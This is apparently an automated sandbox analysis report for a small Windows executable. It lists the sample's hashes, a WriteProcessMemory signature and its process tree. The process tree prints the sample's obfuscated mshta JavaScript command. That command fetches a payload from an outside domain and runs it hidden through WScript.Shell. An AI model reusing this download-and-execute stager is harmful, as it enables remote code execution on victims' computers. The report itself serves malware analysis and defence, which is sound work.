Analysis

  • max time kernel
    137s
  • max time network
    146s
  • platform
    windows7_x64
  • resource
    win7-en
  • submitted
    02-09-2021 17:45

General

  • Target

    usfive_20210902-062006.exe

  • Size

    2KB

  • MD5

    3bf58fb4fd28cc6d24da20bbf69f337a

  • SHA1

    33b1f71be7a12af9d58fc288b5b8681da077629d

  • SHA256

    4b40eb7af466f9aada78a955661f611e45e288a89b6ebbbbd899ec0b5a41c3ae

  • SHA512

    dce815a730cf343ddcf6680ed8ab2b40d9cd9daa8bef72f8290e144fff86493fa34297946f53b814849afade4275d25c5adb43df12a014a8ffae3b86bfe052cf

Score
1/10

Malware Config

Signatures

  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\usfive_20210902-062006.exe
    "C:\Users\Admin\AppData\Local\Temp\usfive_20210902-062006.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2040
    • C:\Windows\SysWOW64\mshta.exe
      mshta "javascript:document.write();0;y=unescape('%320%33%7E%68t%74p%3A%2F%2Fa%73u%310%2Ef%75n%2Fh%72i%2F%3F%321%616%654%62%7E%330').split('~');240;try{x='WinHttp';235;x=new ActiveXObject(x+'.'+x+'Request.5.1');239;x.open('GET',y[1]+'&a='+escape(window.navigator.userAgent),!1);72;x.send();82;y='ipt.S';78;new ActiveXObject('WScr'+y+'hell').Run(unescape(unescape(x.responseText)),0,!2);196;}catch(e){};2;;window.close();"
      2⤵
        PID:1944

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/1944-53-0x0000000000000000-mapping.dmp
    • memory/1944-54-0x00000000764D1000-0x00000000764D3000-memory.dmp
      Filesize

      8KB